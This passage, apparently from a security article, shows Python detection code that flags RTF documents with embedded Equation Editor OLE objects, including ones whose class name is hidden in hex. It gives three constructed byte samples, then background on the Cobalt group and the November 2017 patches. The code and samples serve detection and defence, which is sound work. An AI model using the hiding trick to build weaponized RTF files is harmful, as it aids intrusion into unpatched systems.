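    # \objclass is optional and attackers omit it, so the hex-level check is the
    # one that matters; either indicator is enough to pull the file for analysis.
    indicators["suspicious"] = indicators["objclass_equation"] or indicators["objdata_equation"]
    return indicators


# Constructed samples (not real malware): a minimal OLE1 header for an
# Equation.3 object, the same object with its class name hidden, and a benign
# embedded Word document.
SAMPLE_EQUATION = (
    b"{\\rtf1{\\object\\objemb\\objupdate{\\*\\objclass Equation.3}"
    b"{\\*\\objdata 01050000 02000000 0b000000\n4571756174696f6e2e3300 00000000 00000000}}}"
)
SAMPLE_HIDDEN = (
    b"{\\rtf1{\\object\\objemb{\\*\\objdata 0105000002000000\n0b00000045717561\n74696f6e2e3300}}}"
)
SAMPLE_BENIGN = (
    b"{\\rtf1{\\object\\objemb{\\*\\objclass Word.Document.8}"
    b"{\\*\\objdata 010500000200000010000000576f72642e446f63756d656e742e3800}}}"
)

if __name__ == "__main__":
    for name, doc in [("equation", SAMPLE_EQUATION), ("hidden", SAMPLE_HIDDEN), ("benign", SAMPLE_BENIGN)]:
        print(name, triage_rtf(doc))
```

Run over a mail quarantine this separates documents worth detonating from the rest in milliseconds per file; the hex check is what catches samples whose authors stripped \objclass, and objupdate tells you whether the victim had to click at all.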

The Cobalt group has already exploited Microsoft bugs in past campaigns, for example the RCE vulnerability tracked as CVE-2017-8759 that was fixed by Microsoft in the September 2017 Patch Tuesday.

The Cobalt group was first spotted in 2016 targeting ATMs and financial institutions across Europe; it later targeted organizations in the Americas and Russia.

To protect their systems, administrators should apply the Windows updates KB2553204, KB3162047, KB4011276, and KB4011262, included in the November 2017 Patch Tuesday.